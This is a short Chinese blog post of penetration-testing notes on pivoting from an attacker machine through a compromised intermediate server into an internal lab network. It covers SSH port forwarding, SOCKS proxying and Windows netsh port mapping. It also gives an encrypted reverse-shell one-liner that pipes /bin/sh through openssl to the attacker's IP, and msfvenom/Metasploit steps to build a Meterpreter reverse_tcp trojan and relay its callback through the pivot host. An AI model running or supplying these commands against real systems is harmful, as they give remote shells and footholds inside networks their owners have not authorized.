ssh隧道


ssh隧道

黑客(192.168.3.134)———-(192.168.3.142)server1(172.16.1.104)———-(172.16.1.103)server2

正向隧道

在server1上面

curl http://172.16.1.103 //测试访问
ssh -CNfL 0.0.0.0:7777:172.16.1.103:80 root@127.0.0.1   //做一个映射

黑客就可以访问了

反向隧道

在server1上面

ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.3.134 //把本地22映射到黑客的2222

在黑客上

ssh -p 2222 root@127.0.0.1   //连接到server1
curl http://172.16.1.103    //访问

另一种方法

在server1上面

ssh -qTfnN -R 2223:17.16.1.103:80 root@192.168.3.134 //把server2的80端口映射到黑客的2223

ssh本地s5代理

ssh -qTfnN -D 7070 root@192.168.3.142   //以自己的7070端口连接中间人

然后在火狐里

image-20220329155546288

image-20220329155609282

image-20220329155631317

就可以访问网站了

ssh本地转发

在黑客机器上

ssh -L 0.0.0.0:6667:172.16.1.103:80 root@192.168.3.142 -fN

然后访问127.0.0.1:6667就可以了!

ssh远程转发

在server1上修改ssh配置

vi /etc/ssh/ssh_config
gatewayports yes

在server2上

ssh -R 8877:172.16.1.103:80 root@192.168.3.142

opssl反弹加密

黑客:

ssl生成自签名证书

监听端口

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

目标:反向连接

mkfifo /tmp/s;/bin/sh -i &1 | openssl s_client -quiet -connect 192.168.3.134:8080 >/tmp/s;rm /tmp/s

netsh端口映射

server1变为windows 外网:192.168.3.133 内网:172.16.1.102

在server1

netsh interface portproxy add v4tov4 listenport=7777 connectaddress=172.16.1.103 connectport=80
netsh interface portproxy show all

黑客

curl 192.168.3.133:80 就可以访问了

如果要关闭

server1

netsh interface portproxy reset
netsh interface portproxy show all

netsh进行msf代理

如果给server2种下木马,在中间人做netsh,用server1做跳板

黑客

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.104 lport=4455 -f exe > muma.exe

新打开个窗口

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.134  //黑客的ip
set lport 4455

然后把木马放过去

然后进入中间人这里

netsh interface portproxy add v4tov4 listenport=4455 connectaddress=192.168.3.134 connectport=4455

文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录